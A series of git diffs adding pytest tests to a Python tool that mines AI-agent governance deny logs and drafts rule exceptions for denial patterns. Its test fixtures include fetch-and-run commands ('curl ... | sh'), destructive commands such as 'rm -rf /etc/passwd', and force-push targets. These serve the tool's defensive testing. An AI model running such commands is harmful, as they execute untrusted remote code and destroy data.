+    assert patterns[0].first_seen == datetime(2026, 4, 25, 8, 0, tzinfo=timezone.utc)
+    assert patterns[0].last_seen == datetime(2026, 4, 25, 15, 0, tzinfo=timezone.utc)
+
+
+def test_sample_envelope_ids_are_first_three():
+    decisions = [_decision(envelope_id=f"env_{i:03d}") for i in range(5)]
+    patterns = detect_patterns(decisions)
+    assert patterns[0].sample_envelope_ids == ("env_000", "env_001", "env_002")
+
+
+def test_determinism_two_runs_byte_equal():
+    decisions = [
+        _decision(rule_id="b", envelope_id="e1"),
+        _decision(rule_id="a", envelope_id="e2"),
+        _decision(rule_id="b", envelope_id="e3"),
+    ]
+    a = detect_patterns(decisions)
+    b = detect_patterns(decisions)
+    assert a == b

--- a/python/analysis/tests/test_draft_registry.py
+++ b/python/analysis/tests/test_draft_registry.py
@@ -1,0 +1,34 @@
+"""Tests for the template registry and draft dispatch."""
+from datetime import datetime, timezone
+
+from analysis.draft import draft_for_pattern, reason_no_template
+from analysis.types import Pattern
+
+
+def _pattern(rule_id="unknown_rule", count=5):
+    return Pattern(
+        rule_id=rule_id,
+        action_type="shell.exec",
+        agent_id="copilot-cli",
+        count=count,
+        first_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        last_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        decision_class="deny",
+        sample_envelope_ids=("e1", "e2", "e3"),
+        decisions=(),
+    )
+
+
+def test_unknown_rule_id_returns_none():
+    assert draft_for_pattern(_pattern(rule_id="totally_unknown")) is None
+
+
+def test_registry_lookup_by_rule_id():
+    from analysis.templates import REGISTRY
+    assert isinstance(REGISTRY, dict)
+
+
+def test_reason_no_template_for_unknown():
+    msg = reason_no_template(_pattern(rule_id="totally_unknown"))
+    assert "no template registered" in msg
+    assert "totally_unknown" in msg

--- a/python/analysis/tests/test_llm_draft.py
+++ b/python/analysis/tests/test_llm_draft.py
@@ -1,0 +1,66 @@
+"""Tests for Layer 2 LLM-drafted rules.
+
+The LLM call is mocked. We test the fallback contract: any failure in the
+LLM path falls back to the heuristic draft, never raises, never aborts.
+"""
+from datetime import datetime, timezone
+from unittest.mock import patch
+
+from analysis.llm_draft import enrich_with_llm
+from analysis.types import Pattern, PredictedImpact, RuleDraft
+
+
+def _heuristic_draft():
+    return RuleDraft(
+        kind="heuristic",
+        template="t",
+        confidence="medium",
+        rule_yaml="rules: []\n",
+        predicted_impact=PredictedImpact(samples_evaluated=1, would_allow=1,
+                                         would_still_deny=0, method="m"),
+        notes="",
+    )
+
+
+def _pattern():
+    return Pattern(
+        rule_id="r", action_type="t", agent_id="a", count=1,
+        first_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        last_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        decision_class="deny", sample_envelope_ids=("e1",), decisions=(),
+    )
+
+
+def test_llm_failure_falls_back_to_heuristic():
+    with patch("analysis.llm_draft._call_ollama", side_effect=RuntimeError("boom")):
+        out = enrich_with_llm([(_pattern(), _heuristic_draft())])
+    assert len(out) == 1
+    assert out[0].kind == "heuristic-fallback"
+    assert out[0].rule_yaml == "rules: []\n"
+
+
+def test_llm_success_returns_llm_draft():
+    fake_yaml = "rules:\n  - id: llm-drafted\n"
+
+    def fake_call(*args, **kwargs):
+        return fake_yaml
+
+    with patch("analysis.llm_draft._call_ollama", side_effect=fake_call):
+        out = enrich_with_llm([(_pattern(), _heuristic_draft())])
+    assert len(out) == 1
+    assert out[0].kind == "llm"
+    assert "llm-drafted" in out[0].rule_yaml
+
+
+def test_no_heuristic_passes_through():
+    with patch("analysis.llm_draft._call_ollama", return_value="..."):
+        out = enrich_with_llm([(_pattern(), None)])
+    assert out == []
+
+
+def test_empty_llm_response_falls_back():
+    with patch("analysis.llm_draft._call_ollama", return_value="   "):
+        out = enrich_with_llm([(_pattern(), _heuristic_draft())])
+    assert len(out) == 1
+    assert out[0].kind == "heuristic-fallback"
+    assert "empty LLM response" in out[0].notes

--- a/python/analysis/tests/test_llm_draft.py
+++ b/python/analysis/tests/test_llm_draft.py
@@ -50,6 +50,9 @@ def test_llm_success_returns_llm_draft():
     assert len(out) == 1
     assert out[0].kind == "llm"
     assert "llm-drafted" in out[0].rule_yaml
+    # Impact prediction is INHERITED (not re-evaluated against LLM yaml).
+    # Method tag must say so, so consumers don't conflate.
+    assert "inherited" in out[0].predicted_impact.method.lower()
 
 
 def test_no_heuristic_passes_through():

--- a/python/analysis/tests/test_loaders.py
+++ b/python/analysis/tests/test_loaders.py
@@ -57,6 +57,21 @@ def test_load_with_missing_dir(tmp_path):
     assert result.decisions == []
 
 
+def test_load_skips_directory_whose_name_matches_pattern(tmp_path, fixtures_dir):
+    """Regression for Copilot review: a dir named like a JSONL file must not crash."""
+    src = fixtures_dir / "gov-decisions-fixture.jsonl"
+    (tmp_path / "gov-decisions-2026-04-25.jsonl").write_text(src.read_text())
+    # Adversarial: a directory whose name matches the pattern.
+    (tmp_path / "gov-decisions-2026-04-26.jsonl").mkdir()
+    window = Window(
+        since=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        until=datetime(2026, 4, 27, tzinfo=timezone.utc),
+    )
+    result = load_gov_decisions(tmp_path, window)
+    # Only the real file is read; the directory is silently skipped.
+    assert result.files_read == 1
+
+
 def test_load_skips_non_matching_filenames(tmp_path, fixtures_dir):
     src = fixtures_dir / "gov-decisions-fixture.jsonl"
     (tmp_path / "gov-decisions-2026-04-25.jsonl").write_text(src.read_text())

--- a/python/analysis/tests/test_loaders.py
+++ b/python/analysis/tests/test_loaders.py
@@ -1,0 +1,89 @@
+"""Tests for gov-decisions JSONL loaders."""
+from datetime import datetime, timezone
+
+import pytest
+
+from analysis.loaders import LoadResult, Window, load_gov_decisions, parse_window_str
+
+
+@pytest.fixture
+def decisions_dir(tmp_path, fixtures_dir):
+    src = fixtures_dir / "gov-decisions-fixture.jsonl"
+    dst = tmp_path / "gov-decisions-2026-04-25.jsonl"
+    dst.write_text(src.read_text())
+    return tmp_path
+
+
+def test_load_with_full_window(decisions_dir):
+    window = Window(
+        since=datetime(2026, 4, 25, 0, 0, tzinfo=timezone.utc),
+        until=datetime(2026, 4, 26, 0, 0, tzinfo=timezone.utc),
+    )
+    result = load_gov_decisions(decisions_dir, window)
+    assert isinstance(result, LoadResult)
+    assert result.files_read == 1
+    assert result.parse_errors == 2
+    assert len(result.decisions) == 8
+
+
+def test_load_with_narrow_window_excludes_outside(decisions_dir):
+    window = Window(
+        since=datetime(2026, 4, 25, 9, 0, tzinfo=timezone.utc),
+        until=datetime(2026, 4, 25, 11, 0, tzinfo=timezone.utc),
+    )
+    result = load_gov_decisions(decisions_dir, window)
+    envelope_ids = {d.envelope_id for d in result.decisions}
+    assert envelope_ids == {"env_004", "env_005"}
+
+
+def test_load_with_empty_dir(tmp_path):
+    window = Window(
+        since=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        until=datetime(2026, 4, 26, tzinfo=timezone.utc),
+    )
+    result = load_gov_decisions(tmp_path, window)
+    assert result.files_read == 0
+    assert result.decisions == []
+    assert result.parse_errors == 0
+
+
+def test_load_with_missing_dir(tmp_path):
+    window = Window(
+        since=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        until=datetime(2026, 4, 26, tzinfo=timezone.utc),
+    )
+    result = load_gov_decisions(tmp_path / "does-not-exist", window)
+    assert result.files_read == 0
+    assert result.decisions == []
+
+
+def test_load_skips_non_matching_filenames(tmp_path, fixtures_dir):
+    src = fixtures_dir / "gov-decisions-fixture.jsonl"
+    (tmp_path / "gov-decisions-2026-04-25.jsonl").write_text(src.read_text())
+    (tmp_path / "other-file.jsonl").write_text("ignored\n")
+    (tmp_path / "gov-decisions.txt").write_text("ignored\n")
+    window = Window(
+        since=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        until=datetime(2026, 4, 26, tzinfo=timezone.utc),
+    )
+    result = load_gov_decisions(tmp_path, window)
+    assert result.files_read == 1
+
+
+def test_parse_window_str_days():
+    now = datetime(2026, 4, 30, 12, 0, tzinfo=timezone.utc)
+    w = parse_window_str("7d", now)
+    assert w.since == datetime(2026, 4, 23, 12, 0, tzinfo=timezone.utc)
+    assert w.until == now
+
+
+def test_parse_window_str_hours():
+    now = datetime(2026, 4, 30, 12, 0, tzinfo=timezone.utc)
+    w = parse_window_str("24h", now)
+    assert w.since == datetime(2026, 4, 29, 12, 0, tzinfo=timezone.utc)
+
+
+def test_parse_window_str_invalid_raises():
+    now = datetime(2026, 4, 30, tzinfo=timezone.utc)
+    with pytest.raises(ValueError):
+        parse_window_str("7y", now)

--- a/python/analysis/tests/test_stubs.py
+++ b/python/analysis/tests/test_stubs.py
@@ -1,0 +1,42 @@
+"""Tests that the debt and souls stubs produce valid empty findings.
+
+Foundation-generalization proof: if the stubs plug into the same writers
+and produce valid JSON/markdown, the foundation is reusable.
+"""
+import json
+import subprocess
+import sys
+
+
+def test_debt_stub_writes_valid_empty_json(tmp_path):
+    out_dir = tmp_path / "out"
+    result = subprocess.run(
+        [sys.executable, "-m", "analysis.debt",
+         "--out-dir", str(out_dir),
+         "--now", "2026-04-30T12:00:00+00:00"],
+        capture_output=True, text=True,
+    )
+    assert result.returncode == 0, result.stderr
+    json_path = next(out_dir.glob("debt-*.json"))
+    body = json.loads(json_path.read_text())
+    assert body["stream"] == "debt"
+    assert body["patterns"] == []
+    md_path = next(out_dir.glob("debt-*.md"))
+    assert "Debt Analysis" in md_path.read_text()
+
+
+def test_souls_stub_writes_valid_empty_json(tmp_path):
+    out_dir = tmp_path / "out"
+    result = subprocess.run(
+        [sys.executable, "-m", "analysis.souls",
+         "--out-dir", str(out_dir),
+         "--now", "2026-04-30T12:00:00+00:00"],
+        capture_output=True, text=True,
+    )
+    assert result.returncode == 0, result.stderr
+    json_path = next(out_dir.glob("souls-*.json"))
+    body = json.loads(json_path.read_text())
+    assert body["stream"] == "souls"
+    assert body["patterns"] == []
+    md_path = next(out_dir.glob("souls-*.md"))
+    assert "Souls Analysis" in md_path.read_text()

--- a/python/analysis/tests/test_template_bounds_max_files.py
+++ b/python/analysis/tests/test_template_bounds_max_files.py
@@ -1,0 +1,65 @@
+"""Tests for the bounds:max_files_changed heuristic template."""
+from datetime import datetime, timezone
+
+from analysis.templates.bounds_max_files_changed import draft
+from analysis.types import Decision, Pattern
+
+
+def _pattern_with_reason(*reasons):
+    decisions = tuple(
+        Decision(
+            ts=datetime(2026, 4, 25, 8, i, tzinfo=timezone.utc),
+            allowed=False,
+            rule_id="bounds:max_files_changed",
+            action_type="git.push",
+            reason=r,
+            envelope_id=f"e{i}",
+        )
+        for i, r in enumerate(reasons)
+    )
+    return Pattern(
+        rule_id="bounds:max_files_changed",
+        action_type="git.push",
+        agent_id="<unknown>",
+        count=len(reasons),
+        first_seen=decisions[0].ts,
+        last_seen=decisions[-1].ts,
+        decision_class="deny",
+        sample_envelope_ids=tuple(d.envelope_id for d in decisions[:3]),
+        decisions=decisions,
+    )
+
+
+def test_doc_batch_drafted():
+    p = _pattern_with_reason(
+        "41 files changed exceeds ceiling of 25 (all under docs/)",
+        "30 files changed exceeds ceiling of 25 (all under docs/)",
+    )
+    d = draft(p)
+    assert d is not None
+    assert d.template == "bounds_max_files_changed"
+    assert "doc-batch" in d.rule_yaml
+    assert d.predicted_impact.would_allow == 2
+
+
+def test_no_doc_signal_returns_none():
+    p = _pattern_with_reason(
+        "60 files changed exceeds ceiling of 25",
+        "100 files changed exceeds ceiling of 25",
+    )
+    assert draft(p) is None
+
+
+def test_empty_pattern_returns_none():
+    p = Pattern(
+        rule_id="bounds:max_files_changed",
+        action_type="git.push",
+        agent_id="<unknown>",
+        count=0,
+        first_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        last_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        decision_class="deny",
+        sample_envelope_ids=(),
+        decisions=(),
+    )
+    assert draft(p) is None

--- a/python/analysis/tests/test_template_bounds_max_files.py
+++ b/python/analysis/tests/test_template_bounds_max_files.py
@@ -38,7 +38,12 @@ def test_doc_batch_drafted():
     d = draft(p)
     assert d is not None
     assert d.template == "bounds_max_files_changed"
-    assert "doc-batch" in d.rule_yaml
+    # Schema check: emits valid chitin global Bounds block, not a fake per-rule field.
+    assert "bounds:" in d.rule_yaml
+    assert "max_files_changed" in d.rule_yaml
+    # Per-rule bounds with path predicate requires kernel change (Issue #70).
+    assert "Issue #70" in d.notes
+    assert d.confidence == "low"
     assert d.predicted_impact.would_allow == 2
 
 

--- a/python/analysis/tests/test_template_no_curl_pipe_bash.py
+++ b/python/analysis/tests/test_template_no_curl_pipe_bash.py
@@ -50,7 +50,26 @@ def test_trusted_hosts_drafted():
     d = draft(p)
     assert d is not None
     assert "trusted-curl-hosts" in d.rule_yaml
+    # Schema check: chitin keys, not made-up keys.
+    assert "action: shell.exec" in d.rule_yaml
+    assert "effect: allow" in d.rule_yaml
+    assert "when:" not in d.rule_yaml
     assert d.predicted_impact.would_allow == 2
+
+
+def test_trusted_hosts_set_matches_emitted_regex():
+    """TRUSTED_HOSTS predicts impact; emitted regex applies the rule. They must agree."""
+    from analysis.templates.no_curl_pipe_bash import TRUSTED_HOSTS
+    # raw.githubusercontent.com is a path-based judgment, not a flat allow.
+    # If it ever lands in TRUSTED_HOSTS, the regex below must include it too.
+    sample_target = f"curl https://example.com/a.sh | sh"
+    p = _pattern(*[f"curl https://{h}/x.sh | sh" for h in TRUSTED_HOSTS])
+    d = draft(p)
+    assert d is not None
+    # Every host in TRUSTED_HOSTS must appear in the emitted regex.
+    for host in TRUSTED_HOSTS:
+        escaped = host.replace(".", "\\.")
+        assert escaped in d.rule_yaml, f"host {host} predicts allow but not in emitted regex"
 
 
 def test_unknown_host_returns_none():

--- a/python/analysis/tests/test_template_no_curl_pipe_bash.py
+++ b/python/analysis/tests/test_template_no_curl_pipe_bash.py
@@ -1,0 +1,73 @@
+"""Tests for the no-curl-pipe-bash heuristic template."""
+from datetime import datetime, timezone
+
+from analysis.templates.no_curl_pipe_bash import draft, extract_host
+from analysis.types import Decision, Pattern
+
+
+def _pattern(*targets):
+    decisions = tuple(
+        Decision(
+            ts=datetime(2026, 4, 25, 8, i, tzinfo=timezone.utc),
+            allowed=False,
+            rule_id="no-curl-pipe-bash",
+            action_type="shell.exec",
+            action_target=t,
+            envelope_id=f"e{i}",
+        )
+        for i, t in enumerate(targets)
+    )
+    return Pattern(
+        rule_id="no-curl-pipe-bash",
+        action_type="shell.exec",
+        agent_id="copilot-cli",
+        count=len(targets),
+        first_seen=decisions[0].ts,
+        last_seen=decisions[-1].ts,
+        decision_class="deny",
+        sample_envelope_ids=tuple(d.envelope_id for d in decisions[:3]),
+        decisions=decisions,
+    )
+
+
+def test_extract_host_basic():
+    assert extract_host("curl https://example.com/x.sh | bash") == "example.com"
+    assert extract_host("curl http://foo.bar.baz/a | sh") == "foo.bar.baz"
+    assert extract_host("curl -L https://get.deno.land/install.sh | sh") == "get.deno.land"
+
+
+def test_extract_host_returns_none_for_no_url():
+    assert extract_host("") is None
+    assert extract_host("rm -rf /") is None
+    assert extract_host("curl | bash") is None
+
+
+def test_trusted_hosts_drafted():
+    p = _pattern(
+        "curl https://get.deno.land/install.sh | sh",
+        "curl https://sh.rustup.rs | sh",
+    )
+    d = draft(p)
+    assert d is not None
+    assert "trusted-curl-hosts" in d.rule_yaml
+    assert d.predicted_impact.would_allow == 2
+
+
+def test_unknown_host_returns_none():
+    p = _pattern("curl https://random-blog.example/script.sh | bash")
+    assert draft(p) is None
+
+
+def test_empty_pattern_returns_none():
+    p = Pattern(
+        rule_id="no-curl-pipe-bash",
+        action_type="shell.exec",
+        agent_id="copilot-cli",
+        count=0,
+        first_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        last_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        decision_class="deny",
+        sample_envelope_ids=(),
+        decisions=(),
+    )
+    assert draft(p) is None

--- a/python/analysis/tests/test_template_no_destructive_rm.py
+++ b/python/analysis/tests/test_template_no_destructive_rm.py
@@ -43,6 +43,13 @@ def test_safe_dirs_are_drafted_as_allow_exception():
     assert d.kind == "heuristic"
     assert d.template == "no_destructive_rm"
     assert "no-destructive-rm-safe-dirs" in d.rule_yaml
+    # Schema check: must use real chitin keys (action/effect/target_regex),
+    # not made-up keys (when/decide/action_type).
+    assert "action: shell.exec" in d.rule_yaml
+    assert "effect: allow" in d.rule_yaml
+    assert "target_regex:" in d.rule_yaml
+    assert "when:" not in d.rule_yaml
+    assert "decide:" not in d.rule_yaml
     assert d.predicted_impact.samples_evaluated == 4
     assert d.predicted_impact.would_allow == 4
     assert d.predicted_impact.would_still_deny == 0

--- a/python/analysis/tests/test_template_no_destructive_rm.py
+++ b/python/analysis/tests/test_template_no_destructive_rm.py
@@ -1,0 +1,83 @@
+"""Tests for the no-destructive-rm heuristic template."""
+from datetime import datetime, timezone
+
+from analysis.templates.no_destructive_rm import draft
+from analysis.types import Decision, Pattern
+
+
+def _pattern_with_targets(*targets):
+    decisions = tuple(
+        Decision(
+            ts=datetime(2026, 4, 25, 8, i, tzinfo=timezone.utc),
+            allowed=False,
+            rule_id="no-destructive-rm",
+            action_type="shell.exec",
+            action_target=t,
+            agent="copilot-cli",
+            envelope_id=f"e{i}",
+        )
+        for i, t in enumerate(targets)
+    )
+    return Pattern(
+        rule_id="no-destructive-rm",
+        action_type="shell.exec",
+        agent_id="copilot-cli",
+        count=len(targets),
+        first_seen=decisions[0].ts,
+        last_seen=decisions[-1].ts,
+        decision_class="deny",
+        sample_envelope_ids=tuple(d.envelope_id for d in decisions[:3]),
+        decisions=decisions,
+    )
+
+
+def test_safe_dirs_are_drafted_as_allow_exception():
+    p = _pattern_with_targets(
+        "rm -rf /tmp/cleanup",
+        "rm -rf /test/output",
+        "rm -rf out/build",
+        "rm -rf graphify-out/wiki",
+    )
+    d = draft(p)
+    assert d is not None
+    assert d.kind == "heuristic"
+    assert d.template == "no_destructive_rm"
+    assert "no-destructive-rm-safe-dirs" in d.rule_yaml
+    assert d.predicted_impact.samples_evaluated == 4
+    assert d.predicted_impact.would_allow == 4
+    assert d.predicted_impact.would_still_deny == 0
+
+
+def test_mixed_targets_split_correctly():
+    p = _pattern_with_targets(
+        "rm -rf /tmp/cleanup",
+        "rm -rf /etc/passwd",
+        "rm -rf /home/user/important",
+    )
+    d = draft(p)
+    assert d is not None
+    assert d.predicted_impact.would_allow == 1
+    assert d.predicted_impact.would_still_deny == 2
+
+
+def test_pattern_with_no_safe_targets_returns_none():
+    p = _pattern_with_targets(
+        "rm -rf /etc/passwd",
+        "rm -rf /home/user/important",
+    )
+    assert draft(p) is None
+
+
+def test_pattern_with_no_decisions_returns_none():
+    p = Pattern(
+        rule_id="no-destructive-rm",
+        action_type="shell.exec",
+        agent_id="copilot-cli",
+        count=0,
+        first_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        last_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        decision_class="deny",
+        sample_envelope_ids=(),
+        decisions=(),
+    )
+    assert draft(p) is None

--- a/python/analysis/tests/test_template_no_force_push.py
+++ b/python/analysis/tests/test_template_no_force_push.py
@@ -1,0 +1,66 @@
+"""Tests for the no-force-push heuristic template."""
+from datetime import datetime, timezone
+
+from analysis.templates.no_force_push import draft
+from analysis.types import Decision, Pattern
+
+
+def _pattern(*targets):
+    decisions = tuple(
+        Decision(
+            ts=datetime(2026, 4, 25, 8, i, tzinfo=timezone.utc),
+            allowed=False,
+            rule_id="no-force-push",
+            action_type="git.force-push",
+            action_target=t,
+            envelope_id=f"e{i}",
+        )
+        for i, t in enumerate(targets)
+    )
+    return Pattern(
+        rule_id="no-force-push",
+        action_type="git.force-push",
+        agent_id="copilot-cli",
+        count=len(targets),
+        first_seen=decisions[0].ts,
+        last_seen=decisions[-1].ts,
+        decision_class="deny",
+        sample_envelope_ids=tuple(d.envelope_id for d in decisions[:3]),
+        decisions=decisions,
+    )
+
+
+def test_personal_branches_drafted():
+    p = _pattern("feat/foo", "fix/bar", "spike/x")
+    d = draft(p)
+    assert d is not None
+    assert "no-force-push-feature-branches" in d.rule_yaml
+    assert d.predicted_impact.would_allow == 3
+
+
+def test_main_still_denied():
+    p = _pattern("main", "master")
+    assert draft(p) is None
+
+
+def test_mixed():
+    p = _pattern("feat/foo", "main", "fix/bar")
+    d = draft(p)
+    assert d is not None
+    assert d.predicted_impact.would_allow == 2
+    assert d.predicted_impact.would_still_deny == 1
+
+
+def test_empty_pattern_returns_none():
+    p = Pattern(
+        rule_id="no-force-push",
+        action_type="git.force-push",
+        agent_id="copilot-cli",
+        count=0,
+        first_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        last_seen=datetime(2026, 4, 25, tzinfo=timezone.utc),
+        decision_class="deny",
+        sample_envelope_ids=(),
+        decisions=(),
+    )
+    assert draft(p) is None

--- a/python/analysis/tests/test_template_no_force_push.py
+++ b/python/analysis/tests/test_template_no_force_push.py
@@ -35,6 +35,10 @@ def test_personal_branches_drafted():
     d = draft(p)
     assert d is not None
     assert "no-force-push-feature-branches" in d.rule_yaml
+    # Schema check: real chitin keys.
+    assert "action: git.force-push" in d.rule_yaml
+    assert "effect: allow" in d.rule_yaml
+    assert "when:" not in d.rule_yaml
     assert d.predicted_impact.would_allow == 3
 
 

--- a/python/analysis/tests/test_templates_auto_register.py
+++ b/python/analysis/tests/test_templates_auto_register.py
@@ -1,0 +1,13 @@
+"""Tests that all v1 templates self-register on import."""
+from analysis.templates import REGISTRY
+import analysis.templates.all  # noqa: F401
+
+
+def test_all_v1_templates_registered():
+    expected = {
+        "no-destructive-rm",
+        "bounds:max_files_changed",
+        "no-curl-pipe-bash",
+        "no-force-push",
+    }
+    assert expected.issubset(REGISTRY.keys())

--- a/python/analysis/tests/test_types.py
+++ b/python/analysis/tests/test_types.py
@@ -1,0 +1,60 @@
+"""Tests for Decision dataclass + parsing."""
+from datetime import datetime, timezone
+
+from analysis.types import Decision, parse_decision_line
+
+
+def test_parse_full_decision_line():
+    line = (
+        '{"ts":"2026-04-29T10:15:32Z","allowed":false,"mode":"enforce",'
+        '"rule_id":"no-destructive-rm","reason":"matched destructive pattern",'
+        '"escalation":false,"agent":"copilot-cli","action_type":"shell.exec",'
+        '"action_target":"rm -rf /tmp/foo","envelope_id":"env_abc123",'
+        '"tier":"T0","cost_usd":0.0,"input_bytes":42,"tool_calls":1}'
+    )
+    d = parse_decision_line(line)
+    assert d is not None
+    assert d.ts == datetime(2026, 4, 29, 10, 15, 32, tzinfo=timezone.utc)
+    assert d.allowed is False
+    assert d.rule_id == "no-destructive-rm"
+    assert d.agent == "copilot-cli"
+    assert d.action_type == "shell.exec"
+    assert d.action_target == "rm -rf /tmp/foo"
+    assert d.envelope_id == "env_abc123"
+
+
+def test_parse_decision_with_missing_optional_fields():
+    line = '{"ts":"2026-04-29T10:15:32Z","allowed":true,"mode":"enforce"}'
+    d = parse_decision_line(line)
+    assert d is not None
+    assert d.allowed is True
+    assert d.rule_id is None
+    assert d.agent is None
+    assert d.action_type is None
+
+
+def test_parse_malformed_json_returns_none():
+    assert parse_decision_line("not valid json") is None
+    assert parse_decision_line("") is None
+    assert parse_decision_line("{") is None
+
+
+def test_parse_missing_ts_returns_none():
+    line = '{"allowed":false,"rule_id":"x"}'
+    assert parse_decision_line(line) is None
+
+
+def test_parse_malformed_ts_returns_none():
+    line = '{"ts":"not-a-timestamp","allowed":false}'
+    assert parse_decision_line(line) is None
+
+
+def test_decision_is_frozen():
+    d = Decision(ts=datetime(2026, 1, 1, tzinfo=timezone.utc), allowed=True)
+    import dataclasses
+    try:
+        d.allowed = False  # type: ignore[misc]
+        raised = False
+    except dataclasses.FrozenInstanceError:
+        raised = True
+    assert raised, "Decision must be frozen"

--- a/python/analysis/tests/test_types.py
+++ b/python/analysis/tests/test_types.py
@@ -49,6 +49,42 @@ def test_parse_malformed_ts_returns_none():
     assert parse_decision_line(line) is None
 
 
+def test_parse_handles_non_numeric_cost_without_raising():
+    """Regression for Copilot review: int()/float() coercion must not abort the line (I5)."""
+    line = '{"ts":"2026-04-29T10:15:32Z","allowed":false,"cost_usd":"not-a-number","input_bytes":null,"tool_calls":"abc"}'
+    d = parse_decision_line(line)
+    assert d is not None
+    assert d.cost_usd == 0.0
+    assert d.input_bytes == 0
+    assert d.tool_calls == 0
+
+
+def test_parse_escalation_as_string_preserved():
+    """gov/policy.go emits escalation as 'elevated'/'lockdown' — must not coerce to bool."""
+    line = '{"ts":"2026-04-29T10:15:32Z","allowed":false,"escalation":"lockdown"}'
+    d = parse_decision_line(line)
+    assert d is not None
+    assert d.escalation == "lockdown"
+
+
+def test_parse_escalation_legacy_bool_true_marked_elevated():
+    line = '{"ts":"2026-04-29T10:15:32Z","allowed":false,"escalation":true}'
+    d = parse_decision_line(line)
+    assert d is not None
+    assert d.escalation == "elevated"
+
+
+def test_parse_escalation_false_or_missing_is_none():
+    for raw in [
+        '{"ts":"2026-04-29T10:15:32Z","allowed":true}',
+        '{"ts":"2026-04-29T10:15:32Z","allowed":true,"escalation":false}',
+        '{"ts":"2026-04-29T10:15:32Z","allowed":true,"escalation":""}',
+    ]:
+        d = parse_decision_line(raw)
+        assert d is not None
+        assert d.escalation is None
+
+
 def test_decision_is_frozen():
     d = Decision(ts=datetime(2026, 1, 1, tzinfo=timezone.utc), allowed=True)
     import dataclasses

--- a/python/analysis/tests/test_writers_json.py
+++ b/python/analysis/tests/test_writers_json.py
@@ -1,0 +1,100 @@
+"""Tests for JSON canonical writer."""
+import json
+from datetime import datetime, timezone
+
+from analysis.types import Pattern, PredictedImpact, RuleDraft
+from analysis.writers import build_finding, write_json
+
+
+def _pattern():
+    return Pattern(
+        rule_id="r1",
+        action_type="shell.exec",
+        agent_id="copilot-cli",
+        count=3,
+        first_seen=datetime(2026, 4, 25, 8, 0, tzinfo=timezone.utc),
+        last_seen=datetime(2026, 4, 25, 9, 0, tzinfo=timezone.utc),
+        decision_class="deny",
+        sample_envelope_ids=("e1", "e2", "e3"),
+        decisions=(),
+    )
+
+
+def _draft():
+    return RuleDraft(
+        kind="heuristic",
+        template="t1",
+        confidence="medium",
+        rule_yaml="rules: []\n",
+        predicted_impact=PredictedImpact(
+            samples_evaluated=3, would_allow=2, would_still_deny=1, method="m"
+        ),
+        notes="n",
+    )
+
+
+def test_build_finding_pairs_pattern_with_draft():
+    f = build_finding(_pattern(), _draft(), rank=1)
+    assert f.rank == 1
+    assert f.pattern.rule_id == "r1"
+    assert f.draft is not None
+
+
+def test_build_finding_with_no_draft():
+    f = build_finding(_pattern(), None, rank=2)
+    assert f.draft is None
+
+
+def test_write_json_produces_deterministic_output(tmp_path):
+    findings = [build_finding(_pattern(), _draft(), rank=1)]
+    summary = {"total_decisions": 1225, "denies": 62, "allows": 1163,
+               "files_read": 6, "parse_errors": 0,
+               "distinct_rule_ids": 14}
+    now = datetime(2026, 4, 30, 12, 0, tzinfo=timezone.utc)
+    window_since = datetime(2026, 4, 23, 12, 0, tzinfo=timezone.utc)
+
+    out = tmp_path / "out.json"
+    write_json(out, findings=findings, no_template=[], input_summary=summary,
+               generated_at=now, window_since=window_since,
+               window_until=now, window_days=7)
+    a = out.read_bytes()
+
+    out2 = tmp_path / "out2.json"
+    write_json(out2, findings=findings, no_template=[], input_summary=summary,
+               generated_at=now, window_since=window_since,
+               window_until=now, window_days=7)
+    b = out2.read_bytes()
+
+    assert a == b
+    parsed = json.loads(a)
+    assert parsed["schema_version"] == "1"
+    assert parsed["stream"] == "decisions"
+    assert parsed["window"]["days"] == 7
+    assert parsed["input_summary"]["total_decisions"] == 1225
+    assert len(parsed["patterns"]) == 1
+    assert parsed["patterns"][0]["rank"] == 1
+    assert parsed["patterns"][0]["draft"]["predicted_impact"]["would_allow"] == 2
+
+
+def test_write_json_handles_empty_findings(tmp_path):
+    out = tmp_path / "empty.json"
+    now = datetime(2026, 4, 30, 12, 0, tzinfo=timezone.utc)
+    write_json(out, findings=[], no_template=[],
+               input_summary={"total_decisions": 0, "denies": 0, "allows": 0,
+                              "files_read": 0, "parse_errors": 0,
+                              "distinct_rule_ids": 0},
+               generated_at=now, window_since=now, window_until=now, window_days=7)
+    parsed = json.loads(out.read_bytes())
+    assert parsed["patterns"] == []
+    assert parsed["no_template_patterns"] == []
+
+
+def test_write_json_creates_parent_dirs(tmp_path):
+    out = tmp_path / "subdir" / "nested" / "out.json"
+    now = datetime(2026, 4, 30, tzinfo=timezone.utc)
+    write_json(out, findings=[], no_template=[],
+               input_summary={"total_decisions": 0, "denies": 0, "allows": 0,
+                              "files_read": 0, "parse_errors": 0,
+                              "distinct_rule_ids": 0},
+               generated_at=now, window_since=now, window_until=now, window_days=7)
+    assert out.exists()

--- a/python/analysis/tests/test_writers_json.py
+++ b/python/analysis/tests/test_writers_json.py
@@ -56,20 +56,21 @@ def test_write_json_produces_deterministic_output(tmp_path):
     out = tmp_path / "out.json"
     write_json(out, findings=findings, no_template=[], input_summary=summary,
                generated_at=now, window_since=window_since,
-               window_until=now, window_days=7)
+               window_until=now, window_size="7d")
     a = out.read_bytes()
 
     out2 = tmp_path / "out2.json"
     write_json(out2, findings=findings, no_template=[], input_summary=summary,
                generated_at=now, window_since=window_since,
-               window_until=now, window_days=7)
+               window_until=now, window_size="7d")
     b = out2.read_bytes()
 
     assert a == b
     parsed = json.loads(a)
     assert parsed["schema_version"] == "1"
     assert parsed["stream"] == "decisions"
-    assert parsed["window"]["days"] == 7
+    assert parsed["window"]["size"] == "7d"
+    assert parsed["window"]["total_seconds"] == 7 * 86400
     assert parsed["input_summary"]["total_decisions"] == 1225
     assert len(parsed["patterns"]) == 1
     assert parsed["patterns"][0]["rank"] == 1
